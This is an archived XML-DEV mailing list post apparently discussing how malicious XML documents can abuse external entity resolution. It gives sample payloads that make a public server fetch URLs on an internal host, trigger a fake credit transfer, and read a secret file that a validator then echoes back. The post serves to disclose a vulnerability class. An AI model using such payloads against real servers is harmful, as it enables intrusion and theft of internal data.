[XML-DEV Mailing List Archive Home] [By Thread] [By Date] [Recent Entries] [Reply To This Message] Re: Malicious documents? (WAS: Interesting mailing list & a ra
I wrote, > If anyone can come up with variations on this theme I'd be extremely > interested to hear about them. Here's another possibility, * Firewall penetration. bastion.victim.com is a publicly exposed server, protected.victim.com is an internal host supposedly hidden behind a firewall, but accessible to bastion.victim.com. A malicious client might submit a document of the form, <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://protected.victim.com/victim-uri"> <foo/> to bastion.victim.com causing it to make an unexpected network connection to the internal host. This on its own might be enough to cause trouble, eg., <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://protected.victim.com/credit?user=cracker&amount=1000000"> <foo/> But there's also the possibility of unexpected information disclosure if the response the public server returns to the malicious client contains infomation derived from the entity retrived from the protected host, eg., the following document might be submitted to an online validator which echos back the request entity annotated with validation error reports, but with external entities expanded, <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY secret SYSTEM "http://protected.victim.com/secret.txt"> <bar>&secret;</bar> which might result in a response like this, HTTP/1.1 200 OK Content-Type: text/plain <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY secret SYSTEM "http://protected.victim.com/secret.txt"> <bar>... Credit card details here ...</bar> ^^^ Validity constraint: element "bar" not permitted here. Cheers, Miles
|
PURCHASE STYLUS STUDIO ONLINE TODAY!Purchasing Stylus Studio from our online shop is Easy, Secure and Value Priced! Download The World's Best XML IDE!Accelerate XML development with our award-winning XML IDE - Download a free trial today! Subscribe in XML format
|